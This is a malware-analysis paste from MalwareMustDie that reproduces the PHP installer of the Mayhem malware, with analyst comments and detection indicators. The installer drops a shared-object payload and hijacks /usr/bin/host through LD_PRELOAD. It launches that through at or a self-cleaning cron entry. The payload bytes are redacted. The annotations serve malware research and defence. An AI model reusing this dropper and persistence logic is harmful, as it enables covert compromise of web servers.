
#Mayhem Installer | latest one

MalwareMustDie Jul 27th, 2014 319 Never
  1. #MalwareMustDie | ScrapNote
  2. #Mayhem script installer.
  3. #Case:
  4. https://twitter.com/MalwareMustDie/status/492572445744721921 …
  5. https://twitter.com/MalwareMustDie/status/492556259996876800 …
  6. https://twitter.com/MalwareMustDie/status/492578929232707584 …
  7.  
  8. # codes:
  9.  
  10. <?php
      /*
       * Analyst note: installer stage of the sample. It sets an HTTP header
       * and reads $_SERVER, so it is meant to be requested through a web
       * server; every shell command it issues runs as the account the PHP
       * process runs as.
       */
  11.  
      /* The status lines printed by this script are returned as plain text in the HTTP response. */
  12. header("Content-type: text/plain");
  13.  
      /*
       * Fallback definition, used only when the builtin file_put_contents()
       * is missing (the builtin was introduced in PHP 5).
       * Opens $filename in 'w' mode (create/truncate), writes $data and
       * returns the fwrite() result, or false when the file cannot be
       * opened. The @ suppresses the fopen() warning.
       */
  14. if (! function_exists('file_put_contents')) {
  15.         function file_put_contents($filename, $data) {
  16.                 $f = @fopen($filename, 'w');
  17.                 if (! $f)
  18.                         return false;
  19.                 $bytes = fwrite($f, $data);
  20.                 fclose($f);
  21.                 return $bytes;
  22.         }
  23. }
  24.  
      /*
       * basename("/usr/bin/host") is "host": force-kills every process named
       * "host" that this account is allowed to signal. Presumably this clears
       * an earlier instance of the implant -- not confirmed by this listing.
       * Detection: killall spawned by the web server / PHP process.
       */
  25. @system("killall -9 ".basename("/usr/bin/host"));
  26.  
      /*
       * Embedded 32-bit and 64-bit shared-object payloads. The paste has them
       * redacted to placeholder strings, and both statements lack the closing
       * ';', so the listing as published does not parse.
       */
  27. $so32="xxxxxxxxxxxxxx"
  28. $so64="xxxxxxxxxxxxxx"
  29.  
      /*
       * Word-size probe: intval() clamps at PHP_INT_MAX, which is 2147483647
       * on a 32-bit PHP build, so the comparison is true only there.
       */
  30. $arch = 64;
  31. if (intval("9223372036854775807") == 2147483647)
  32.         $arch = 32;
  33. print "Arch is ".$arch."\n";
  34. $so = $arch == 32 ? $so32 : $so64;
      /*
       * Reads the first 8 bytes of the local /usr/bin/host. unpack("C*")
       * returns a 1-based array, so $n[8] is byte offset 7, the EI_OSABI
       * field of an ELF header (9 = FreeBSD). That byte is copied into
       * offset 7 of the payload, so the dropped library carries the same
       * OS/ABI marking as the binary it will be loaded into.
       * If /usr/bin/host cannot be opened the payload is left unpatched.
       */
  35. $f = fopen("/usr/bin/host", "rb");
  36. if ($f) {
  37.         $n = unpack("C*", fread($f, 8));
  38.         $so[7] = sprintf("%c", $n[8]);
  39.         print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
  40.         fclose($f);
  41. }
      /*
       * Drop: the payload is written to ./atom-aggregator.so in the script's
       * working directory and the file_put_contents() result (byte count, or
       * false on failure) is printed.
       * Indicator: a file of that name in a web-writable directory.
       */
  42. print "SO dumped ".file_put_contents("./atom-aggregator.so", $so)."\n";
      /* With MAYHEM_DEBUG set in the environment the script stops after the drop and launches nothing. */
  43. if (getenv("MAYHEM_DEBUG"))
  44.         exit(0);
      /*
       * $AU = host name + request URI of the request that triggered this
       * script; it is exported to the launched process as the environment
       * variable AU by the shell script built below. The @ covers only the
       * SERVER_NAME lookup.
       */
  45. $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  46. /* second stage dropper */
      /*
       * $HBN is "host"; $SCP is the directory the script runs in.
       * The generated 1.sh does the following:
       *   - cd into $SCP;
       *   - if ./atom-aggregator.so exists: kill running "host" processes,
       *     export AU, set LD_PRELOAD to the dropped library and start
       *     /usr/bin/host, so the dynamic loader maps the library into a
       *     legitimate system binary and its code runs under the process
       *     name "host";
       *   - rewrite the crontab without lines mentioning 1.sh;
       *   - delete 1.sh and exit 0.
       * Detection: a "host" process owned by the web server account whose
       * /proc/<pid>/environ contains LD_PRELOAD and AU, with its working
       * directory inside the web root.
       */
  47. $HBN=basename("/usr/bin/host");
  48. $SCP=getcwd();
  49. $SCR  ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './atom-aggregator.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./atom-aggregator.so\n/usr/bin/host\nunset LD_PRELOAD\n";
  50. $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
      /*
       * Writes the script next to the payload and makes it world-writable
       * and executable (0777). Both calls suppress errors, so a failed write
       * only shows up later as a launch attempt that never succeeds.
       * Indicator: a short-lived 1.sh in a web-writable directory.
       */
  51. @file_put_contents("1.sh", $SCR);
  52. @chmod("1.sh", 0777);
  53. /* try at now, file will be removed, crontab cleaned on success */
      /*
       * First launch attempt: hand 1.sh to the at(1) scheduler, so the job
       * is started by the at daemon rather than as a child of the PHP
       * process. $ret receives the command's exit status.
       * Success is inferred from 1.sh disappearing (the script deletes
       * itself); the file is polled once per second for up to 5 seconds.
       * Detection: at jobs queued by the web server account; check the at
       * spool and the scheduler's logs.
       */
  54. @system("at now -f 1.sh", $ret);
  55. if ($ret == 0) {
  56.         for ($i = 0; $i < 5; $i++) {
  57.                 if (! @file_exists("1.sh")) {
  58.                         print "AT success\n";
  59.                         exit(0);
  60.                 }
  61.                 sleep(1);
  62.         }
  63. }
      /*
       * Second launch attempt, reached when at(1) failed or 1.sh was still
       * present after 5 seconds: the current crontab (minus lines containing
       * "crontab") is re-installed with an every-minute entry for
       * <cwd>/1.sh appended. The script is polled for up to 62 seconds,
       * enough for one cron tick; its disappearance is taken as success.
       * The entry is transient: 1.sh strips it from the crontab when it runs.
       * Detection: crontab changes made by the web server account and cron
       * log lines referencing 1.sh.
       */
  64. @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
  65. if ($ret == 0) {
  66.         for ($i = 0; $i < 62; $i++) {
  67.                 if (! @file_exists("1.sh")) {
  68.                         print "CRONTAB success\n";
  69.                         exit(0);
  70.                 }
  71.                 sleep(1);
  72.         }
  73. }
      /*
       * Last resort when neither scheduler confirmed a launch: run 1.sh
       * directly. In this path the shell and the /usr/bin/host it starts are
       * descendants of the PHP / web server process, which is the easiest
       * of the three launch paths to spot in a process tree.
       */
  74. print "Running straight\n";
  75. @system("./1.sh");
  76.  
  77. ?>
  78.  
  79. -----
  80. #MalwareMustDie | Collected by @unixfreaxjp